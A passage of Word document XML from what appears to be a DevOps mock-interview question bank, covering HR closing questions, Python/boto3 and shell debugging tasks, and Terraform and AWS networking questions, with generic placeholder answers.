    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q70. What kind of role are you looking for?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>HR/Closing</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A strong answer should directly address the HR/Closing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kind of role are you looking for?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q71. Do you have any feedback for us?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>HR/Closing</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A strong answer should directly address the HR/Closing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 you have any feedback for us?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q72. Is there anything else you’d like to ask?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>HR/Closing</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A strong answer should directly address the HR/Closing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Is there anything else you’d like to ask?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q73. Debug and complete the following Python script intended to upload a local file to an S3 bucket. Identify the syntax, naming, path, object-key, exception-handling, and AWS credential issues; then provide a production-safe version.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>Import boto3</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>From botocore.exceptions import clientError</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>s3_client = boto3.client(“s3”)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>local_file_path = “/c/data/”</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>bcuket_name = “swapnilAkhi”</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>s3_object_name = ““</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Python/Debugging</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A strong answer should directly address the Python/Debugging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Debug and complete the following Python script intended to upload a local file to an S3 bucket. Identify the syntax, naming, path, object-key, exception-handling, and AWS credential issues; then provide a production-safe version.</w:t>
        <w:br/>
        <w:br/>
        <w:t>Import boto3</w:t>
        <w:br/>
        <w:t>From botocore.exceptions import clientError</w:t>
        <w:br/>
        <w:br/>
        <w:t>s3_client = boto3.client(“s3”)</w:t>
        <w:br/>
        <w:t>local_file_path = “/c/data/”</w:t>
        <w:br/>
        <w:t>bcuket_name = “swapnilAkhi”</w:t>
        <w:br/>
        <w:t>s3_object_name = ““</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q74. Debug and improve the following shell script intended to find regular files with permissions exactly 777. Explain the quoting, variable naming, permission-mode, error-handling, and filesystem-scope considerations.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>#!/bin/bash</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>Search_path=“/”</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>find “$Search_path” -type f -perm 777 2&gt;/dev/null</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Linux/Shell Debugging</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A strong answer should directly address the Linux/Shell Debugging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Debug and improve the following shell script intended to find regular files with permissions exactly 777. Explain the quoting, variable naming, permission-mode, error-handling, and filesystem-scope considerations.</w:t>
        <w:br/>
        <w:br/>
        <w:t>#!/bin/bash</w:t>
        <w:br/>
        <w:br/>
        <w:t>Search_path=“/”</w:t>
        <w:br/>
        <w:t>find “$Search_path” -type f -perm 777 2&gt;/dev/null</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="1A3C6E"/>
        </w:rPr>
        <w:t>Mock Interview 78 - Terraform Internals, AWS Networking and Linux Deep Dive</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q1. How does Terraform communicate with cloud providers?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Terraform</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Terraform communicate with cloud providers?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q2. What is the purpose of a provider in Terraform?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Terraform</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purpose of a provider in Terraform?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q3. What is the difference between a resource and a data source?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Terraform</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difference between a resource and a data source?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q4. What are input variables, local values, and output values?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Terraform</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input variables, local values, and output values?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q5. What are the data types supported in Terraform?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Terraform</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the data types supported in Terraform?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q6. Can a list be passed as an input variable?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Terraform</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Can a list be passed as an input variable?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q7. Can a map be passed as an input variable?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Terraform</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Can a map be passed as an input variable?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q8. Can a for expression iterate over a list?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Terraform</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Can a for expression iterate over a list?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q9. Explain the following expression:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>for_each = {</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve">  for record in var.records :</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t xml:space="preserve">  "${record.name}-${record.type}" =&gt; record</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Terraform</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the following expression:</w:t>
        <w:br/>
        <w:t>for_each = {</w:t>
        <w:br/>
        <w:t xml:space="preserve">  for record in var.records :</w:t>
        <w:br/>
        <w:t xml:space="preserve">  "${record.name}-${record.type}" =&gt; record</w:t>
        <w:br/>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q10. What is the purpose of:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>"${record.name}-${record.type}" =&gt; record</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Terraform</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purpose of:</w:t>
        <w:br/>
        <w:t>"${record.name}-${record.type}" =&gt; record</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q11. Why do we concatenate the record name and record type?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Terraform</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Why do we concatenate the record name and record type?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q12. How does Terraform store each resource's metadata?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Terraform</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Terraform store each resource's metadata?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q13. How are resources stored in the Terraform state file when using for_each?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Terraform</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are resources stored in the Terraform state file when using for_each?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q14. Can you explain the alias block (or SOA if referring to DNS)?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Terraform</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Can you explain the alias block (or SOA if referring to DNS)?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q15. What is the purpose of terraform import?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Terraform</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the purpose of terraform import?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q16. During code restructuring, why don't we use terraform import?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Terraform</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During code restructuring, why don't we use terraform import?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q17. How do you modularize Terraform code without destroying existing resources?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Terraform</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modularize Terraform code without destroying existing resources?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q18. What precautions do you take while modularizing Terraform?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Terraform</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precautions do you take while modularizing Terraform?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q19. Why do outputs and variable mappings need to be updated during module refactoring?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Terraform</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Why do outputs and variable mappings need to be updated during module refactoring?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q20. What happens if a resource is removed from Terraform code only?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Terraform</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happens if a resource is removed from Terraform code only?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q21. What happens if a resource is removed from both the code and the state?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Terraform</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happens if a resource is removed from both the code and the state?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q22. How would you optimize a Terraform pipeline if even a DNS change takes a long time?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Terraform</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optimize a Terraform pipeline if even a DNS change takes a long time?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q23. Create multiple Route53 DNS records using for_each.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Terraform Coding</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A strong answer should directly address the Terraform Coding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Create multiple Route53 DNS records using for_each.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q24. Explain every line of the for_each map comprehension.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Terraform Coding</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A strong answer should directly address the Terraform Coding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every line of the for_each map comprehension.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q25. Explain how the DNS records are stored in Terraform state.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Terraform Coding</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A strong answer should directly address the Terraform Coding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how the DNS records are stored in Terraform state.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q26. Explain the key used in for_each.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Terraform Coding</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A strong answer should directly address the Terraform Coding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the key used in for_each.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q27. Fill the missing vpc_id reference in the given Terraform code.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Terraform Coding</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A strong answer should directly address the Terraform Coding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Fill the missing vpc_id reference in the given Terraform code.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q28. Complete main.tf using the given variables.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Terraform Coding</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A strong answer should directly address the Terraform Coding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Complete main.tf using the given variables.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q29. Layer 4 vs Layer 7 Load Balancer.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:color w:val="888888"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>AWS Networking</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:left="216"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>A: A strong answer should directly address the AWS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Layer 4 vs Layer 7 Load Balancer.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="23"/>
        </w:rPr>
        <w:t>Q30. Which load balancer supports SSL termination?</w:t>
      </w:r>
